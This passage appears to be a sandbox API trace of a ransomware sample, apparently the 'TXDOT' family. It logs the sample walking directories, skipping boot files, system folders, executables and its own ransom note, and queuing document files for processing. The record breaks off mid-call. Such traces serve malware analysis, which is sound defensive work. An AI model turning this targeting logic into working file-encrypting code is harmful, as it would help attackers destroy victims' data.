StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.829] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.829] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.830] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.831] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.831] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.831] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.831] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.834] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.834] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" [0085.834] SetEvent (hEvent=0x410) returned 1 [0085.835] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.835] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.835] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.835] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0085.835] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0085.835] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" [0085.835] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.835] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.835] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.835] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.835] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.835] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.835] FindClose (in: hFindFile=0xec2470 | out: hFindFile=0xec2470) returned 1 [0085.835] GetProcessHeap () returned 0xe30000 [0085.835] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.835] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0085.835] StrCmpW (psz1="1042", psz2=".") returned 1 [0085.835] StrCmpW (psz1="1042", psz2="..") returned 1 [0085.836] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1042", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system32\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\local\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\boot\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\perflogs\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\programdata\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\drivers\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\wsus\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="crypt_detect") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="cryptolocker") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="ransomware") returned 0x0 [0085.836] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\WINDOWS") returned 0x0 [0085.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files") returned 0x0 [0085.838] GetProcessHeap () returned 0xe30000 [0085.838] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.838] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0085.838] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\*") returned="C:\\588bce7c90097ed212\\1042\\*" [0085.838] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0085.838] StrCmpW (psz1=".", psz2=".") returned 0 [0085.838] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.838] StrCmpW (psz1="..", psz2=".") returned 1 [0085.838] StrCmpW (psz1="..", psz2="..") returned 0 [0085.838] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.839] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.839] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.839] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0085.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0085.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="C:\\588bce7c90097ed212\\1042\\eula.rtf" [0085.839] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.839] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.841] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.841] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.841] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.841] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.855] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.855] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1042\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" [0085.855] SetEvent (hEvent=0x418) returned 1 [0085.855] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.855] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.855] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.855] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0085.855] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0085.855] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" [0085.855] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.855] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.855] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.855] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.855] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.856] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.857] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.857] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.857] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.861] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.861] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" [0085.861] SetEvent (hEvent=0x3fc) returned 1 [0085.861] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.861] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.861] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.861] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0085.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0085.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" [0085.861] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.861] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.861] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.861] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.861] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.862] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.862] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0085.862] GetProcessHeap () returned 0xe30000 [0085.862] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.862] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1043", cAlternateFileName="")) returned 1 [0085.862] StrCmpW (psz1="1043", psz2=".") returned 1 [0085.862] StrCmpW (psz1="1043", psz2="..") returned 1 [0085.862] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.862] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.862] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1043", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system32\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\local\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\boot\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\perflogs\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\programdata\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\drivers\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\wsus\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.862] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="crypt_detect") returned 0x0 [0085.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="cryptolocker") returned 0x0 [0085.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="ransomware") returned 0x0 [0085.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\WINDOWS") returned 0x0 [0085.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files") returned 0x0 [0085.863] GetProcessHeap () returned 0xe30000 [0085.863] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.863] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0085.863] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\*") returned="C:\\588bce7c90097ed212\\1043\\*" [0085.863] FindFirstFileW (in: 